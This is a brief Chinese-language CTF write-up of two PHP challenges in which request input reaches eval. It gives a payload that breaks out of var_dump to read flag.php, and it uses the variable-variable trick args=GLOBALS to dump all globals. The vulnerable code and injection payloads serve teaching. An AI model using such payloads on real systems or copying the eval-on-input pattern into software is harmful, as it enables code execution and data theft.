CTF两个经典的文件包含案例

案例一
URL：http://120.24.86.145:8003/
代码

<?php 
include "waf.php"; 
include "flag.php"; 
$a = @$_REQUEST['hello']; 
eval( "var_dump($a);"); 
show_source(__FILE__); ?>

其实就是拼接eval
可构造如下语句：

1);print_r(file(flag.php));//

到了代码里就是

eval( "var_dump(1);print_r(file(flag.php));//);"); 

案例二

URL：http://120.24.86.145:8004/index1.php

flag In the variable ! <?php  
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^w+$/",$args)){
    die("args error!");
}
eval("var_dump($$args);");
}
?>

这个可以注意一下eval很明显$$.首先他说如果不符合那个正则就die。w的意思是所有的字母。也就是说$args必须要是字母才行。倘若是GLOBALS到eval就是eval("var_dump($GLOBALS);");